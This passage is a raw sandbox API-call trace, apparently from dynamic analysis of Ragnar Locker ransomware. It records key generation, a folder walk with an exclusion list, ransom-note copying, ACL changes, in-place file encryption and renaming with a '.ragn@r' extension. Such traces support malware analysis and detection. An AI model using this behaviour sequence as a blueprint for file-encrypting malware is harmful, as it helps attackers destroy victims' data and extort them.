phProv=0x5cfd638*=0x0) returned 0 [0177.767] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26300) returned 1 [0177.768] CryptGenRandom (in: hProv=0x5d26300, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0177.768] CryptReleaseContext (hProv=0x5d26300, dwFlags=0x0) returned 1 [0177.768] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0177.770] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d268d8) returned 1 [0177.771] CryptGenRandom (in: hProv=0x5d268d8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0177.771] CryptReleaseContext (hProv=0x5d268d8, dwFlags=0x0) returned 1 [0177.771] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0177.774] CryptEncrypt (in: hKey=0x3547b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0177.774] GetLastError () returned 0x80090016 [0177.774] CryptEncrypt (in: hKey=0x3547b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0177.775] GetLastError () returned 0x80090016 [0177.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x428) returned 0x3f0 [0177.776] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d270d0) returned 1 [0177.776] CryptGenRandom (in: hProv=0x5d270d0, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0177.776] CryptReleaseContext (hProv=0x5d270d0, dwFlags=0x0) returned 1 [0177.776] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0177.779] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26520) returned 1 [0177.779] CryptGenRandom (in: hProv=0x5d26520, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0177.779] CryptReleaseContext (hProv=0x5d26520, dwFlags=0x0) returned 1 [0177.780] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0177.782] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26520) returned 1 [0177.783] CryptGenRandom (in: hProv=0x5d26520, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0177.783] CryptReleaseContext (hProv=0x5d26520, dwFlags=0x0) returned 1 [0177.783] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0177.785] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26fc0) returned 1 [0177.786] CryptGenRandom (in: hProv=0x5d26fc0, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0177.786] CryptReleaseContext (hProv=0x5d26fc0, dwFlags=0x0) returned 1 [0177.786] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0177.893] CryptEncrypt (in: hKey=0x3547b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0177.896] GetLastError () returned 0x80090016 [0177.896] CryptEncrypt (in: hKey=0x3547b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0177.897] GetLastError () returned 0x80090016 [0177.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xf3c) returned 0x3b4 [0177.898] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0178.033] GetProcessHeap () returned 0x3520000 [0178.033] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586af0 | out: hHeap=0x3520000) returned 1 [0178.033] CloseHandle (hObject=0x3f0) returned 1 [0178.033] GetProcessHeap () returned 0x3520000 [0178.033] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0178.033] CloseHandle (hObject=0x3b4) returned 1 [0178.033] GetProcessHeap () returned 0x3520000 [0178.033] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0178.035] FindClose (in: hFindFile=0x3547ac0 | out: hFindFile=0x3547ac0) returned 1 [0178.036] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3076", cAlternateFileName="")) returned 1 [0178.036] lstrcmpiW (lpString1="3076", lpString2=".") returned 1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="..") returned 1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Windows") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Windows.old") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Tor browser") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Internet Explorer") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Google") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Opera") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Opera Software") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Mozilla") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="Mozilla Firefox") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="$Recycle.Bin") returned 1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="ProgramData") returned -1 [0178.036] lstrcmpiW (lpString1="3076", lpString2="All Users") returned -1 [0178.036] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0178.036] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="3076" | out: lpString1="3076") returned="3076" [0178.036] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076\\") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\" [0178.036] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\3076\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076\\") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\" [0178.036] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\!$R4GN4R_B8CF767A$!.txt" [0178.036] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\3076\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0178.041] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\*.*" [0178.041] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\3076\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0178.041] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0178.041] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0178.041] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ac0 [0178.041] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0178.041] FindNextFileW (hFindFile=0x3547ac0, lpFindFileData=0x5cfde80) Thread: id = 172 os_tid = 0xd0c [0165.381] GetNamedSecurityInfoW () returned 0x0 [0165.382] SetEntriesInAclW () returned 0x0 [0165.382] SetNamedSecurityInfoW () returned 0x0 [0165.385] LocalFree (hMem=0x3540660) returned 0x0 [0165.385] LocalFree (hMem=0x3540674) returned 0x3540674 [0165.385] LocalFree (hMem=0x3547f80) returned 0x0 [0165.385] GetFileAttributesW (lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "d:\\recovery\\windowsre\\boot.sdi")) returned 0x2026 [0165.385] CreateFileW (lpFileName="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "d:\\recovery\\windowsre\\boot.sdi"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x384 [0165.385] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x5effe70 | out: lpFileSize=0x5effe70*=3170304) returned 1 [0165.385] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x305ff1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.385] GetProcessHeap () returned 0x3520000 [0165.385] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584a48 [0165.386] ReadFile (in: hFile=0x384, lpBuffer=0x3584a48, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effe28, lpOverlapped=0x0 | out: lpBuffer=0x3584a48*, lpNumberOfBytesRead=0x5effe28*=0xf, lpOverlapped=0x0) returned 1 [0165.400] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x5f00000 [0165.400] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.401] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effe44 | out: lpNewFilePointer=0x0) returned 1 [0165.401] ReadFile (in: hFile=0x384, lpBuffer=0x5f00000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x5effe18, lpOverlapped=0x0 | out: lpBuffer=0x5f00000*, lpNumberOfBytesRead=0x5effe18*=0x100000, lpOverlapped=0x0) returned 1 [0165.889] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effe1c | out: lpNewFilePointer=0x0) returned 1 [0165.898] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x100000, nNumberOfBytesToLockHigh=0x0) returned 1 [0165.899] WriteFile (in: hFile=0x384, lpBuffer=0x5f00000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x5effe14, lpOverlapped=0x0 | out: lpBuffer=0x5f00000*, lpNumberOfBytesWritten=0x5effe14*=0x100000, lpOverlapped=0x0) returned 1 [0165.904] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x100000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0165.904] VirtualFree (lpAddress=0x5f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.911] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x306000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.911] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0165.911] WriteFile (in: hFile=0x384, lpBuffer=0x35dbf2c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effe54, lpOverlapped=0x0 | out: lpBuffer=0x35dbf2c*, lpNumberOfBytesWritten=0x5effe54*=0x100, lpOverlapped=0x0) returned 1 [0165.912] WriteFile (in: hFile=0x384, lpBuffer=0x35dc02c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effe54, lpOverlapped=0x0 | out: lpBuffer=0x35dc02c*, lpNumberOfBytesWritten=0x5effe54*=0x100, lpOverlapped=0x0) returned 1 [0165.912] WriteFile (in: hFile=0x384, lpBuffer=0x5effe58*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effe54, lpOverlapped=0x0 | out: lpBuffer=0x5effe58*, lpNumberOfBytesWritten=0x5effe54*=0xf, lpOverlapped=0x0) returned 1 [0165.912] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0165.912] GetProcessHeap () returned 0x3520000 [0166.203] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584a48 | out: hHeap=0x3520000) returned 1 [0166.203] CloseHandle (hObject=0x384) returned 1 [0166.203] lstrcpyW (in: lpString1=0x5eff9c4, lpString2="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi") returned="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi" [0166.203] lstrcatW (in: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi.ragn@r_B8CF767A") returned="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi.ragn@r_B8CF767A" [0166.203] MoveFileExW (lpExistingFileName="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "d:\\recovery\\windowsre\\boot.sdi"), lpNewFileName="\\\\?\\D:\\Recovery\\WindowsRE\\boot.sdi.ragn@r_B8CF767A" (normalized: "d:\\recovery\\windowsre\\boot.sdi.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 173 os_tid = 0xd44 [0166.157] GetNamedSecurityInfoW () returned 0x0 [0166.158] SetEntriesInAclW () returned 0x0 [0166.158] SetNamedSecurityInfoW () returned 0x0 [0166.159] LocalFree (hMem=0x3592b18) returned 0x0 [0166.159] LocalFree (hMem=0x3592b2c) returned 0x3592b2c [0166.159] LocalFree (hMem=0x3592f20) returned 0x0 [0166.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 0x20 [0166.159] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3f0 [0166.160] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x613f97c | out: lpFileSize=0x613f97c*=42674) returned 1 [0166.160] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xa6a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.160] GetProcessHeap () returned 0x3520000 [0166.160] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584bb0 [0166.160] ReadFile (in: hFile=0x3f0, lpBuffer=0x3584bb0, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x613f934, lpOverlapped=0x0 | out: lpBuffer=0x3584bb0*, lpNumberOfBytesRead=0x613f934*=0xf, lpOverlapped=0x0) returned 1 [0166.200] VirtualAlloc (lpAddress=0x0, dwSize=0xa6b2, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0166.200] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.200] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x613f950 | out: lpNewFilePointer=0x0) returned 1 [0166.200] ReadFile (in: hFile=0x3f0, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xa6b2, lpNumberOfBytesRead=0x613f924, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x613f924*=0xa6b2, lpOverlapped=0x0) returned 1 [0166.310] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x613f928 | out: lpNewFilePointer=0x0) returned 1 [0166.310] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa6b2, nNumberOfBytesToLockHigh=0x0) returned 1 [0166.310] WriteFile (in: hFile=0x3f0, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xa6b2, lpNumberOfBytesWritten=0x613f920, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x613f920*=0xa6b2, lpOverlapped=0x0) returned 1 [0166.311] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa6b2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0166.311] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.312] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xa6b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.312] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0166.312] WriteFile (in: hFile=0x3f0, lpBuffer=0x3611e74*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x613f960, lpOverlapped=0x0 | out: lpBuffer=0x3611e74*, lpNumberOfBytesWritten=0x613f960*=0x100, lpOverlapped=0x0) returned 1 [0166.313] WriteFile (in: hFile=0x3f0, lpBuffer=0x3611f74*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x613f960, lpOverlapped=0x0 | out: lpBuffer=0x3611f74*, lpNumberOfBytesWritten=0x613f960*=0x100, lpOverlapped=0x0) returned 1 [0166.313] WriteFile (in: hFile=0x3f0, lpBuffer=0x613f964*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x613f960, lpOverlapped=0x0 | out: lpBuffer=0x613f964*, lpNumberOfBytesWritten=0x613f960*=0xf, lpOverlapped=0x0) returned 1 [0166.313] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0166.313] GetProcessHeap () returned 0x3520000 [0166.313] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584bb0 | out: hHeap=0x3520000) returned 1 [0166.313] CloseHandle (hObject=0x3f0) returned 1 [0166.316] lstrcpyW (in: lpString1=0x613f4d0, lpString2="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" [0166.316] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.ragn@r_B8CF767A") returned="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.ragn@r_B8CF767A" [0166.316] MoveFileExW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.ragn@r_B8CF767A" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 174 os_tid = 0xd38 [0166.679] GetNamedSecurityInfoW () returned 0x0 [0166.680] SetEntriesInAclW () returned 0x0 [0166.680] SetNamedSecurityInfoW () returned 0x0 [0166.683] LocalFree (hMem=0x3592b18) returned 0x0 [0166.683] LocalFree (hMem=0x3592b2c) returned 0x3592b2c [0166.683] LocalFree (hMem=0x3592f20) returned 0x0 [0166.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 0x20 [0166.683] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x384 [0166.683] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x5eff9c8 | out: lpFileSize=0x5eff9c8*=6004) returned 1 [0166.683] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x1765, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.683] GetProcessHeap () returned 0x3520000 [0166.683] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584dd8 [0166.684] ReadFile (in: hFile=0x384, lpBuffer=0x3584dd8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff980, lpOverlapped=0x0 | out: lpBuffer=0x3584dd8*, lpNumberOfBytesRead=0x5eff980*=0xf, lpOverlapped=0x0) returned 1 [0166.692] VirtualAlloc (lpAddress=0x0, dwSize=0x1774, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0166.694] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.694] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff99c | out: lpNewFilePointer=0x0) returned 1 [0166.694] ReadFile (in: hFile=0x384, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x1774, lpNumberOfBytesRead=0x5eff970, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff970*=0x1774, lpOverlapped=0x0) returned 1 [0166.695] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff974 | out: lpNewFilePointer=0x0) returned 1 [0166.695] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1774, nNumberOfBytesToLockHigh=0x0) returned 1 [0166.695] WriteFile (in: hFile=0x384, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x1774, lpNumberOfBytesWritten=0x5eff96c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff96c*=0x1774, lpOverlapped=0x0) returned 1 [0166.695] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1774, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0166.695] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.696] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x1774, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.696] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0166.696] WriteFile (in: hFile=0x384, lpBuffer=0x5d3cfcc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff9ac, lpOverlapped=0x0 | out: lpBuffer=0x5d3cfcc*, lpNumberOfBytesWritten=0x5eff9ac*=0x100, lpOverlapped=0x0) returned 1 [0166.696] WriteFile (in: hFile=0x384, lpBuffer=0x5d3d0cc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff9ac, lpOverlapped=0x0 | out: lpBuffer=0x5d3d0cc*, lpNumberOfBytesWritten=0x5eff9ac*=0x100, lpOverlapped=0x0) returned 1 [0166.696] WriteFile (in: hFile=0x384, lpBuffer=0x5eff9b0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff9ac, lpOverlapped=0x0 | out: lpBuffer=0x5eff9b0*, lpNumberOfBytesWritten=0x5eff9ac*=0xf, lpOverlapped=0x0) returned 1 [0166.697] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0166.697] GetProcessHeap () returned 0x3520000 [0166.697] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584dd8 | out: hHeap=0x3520000) returned 1 [0166.697] CloseHandle (hObject=0x384) returned 1 [0166.698] lstrcpyW (in: lpString1=0x5eff51c, lpString2="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" [0166.698] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpString2=".ragn@r_B8CF767A" | out: 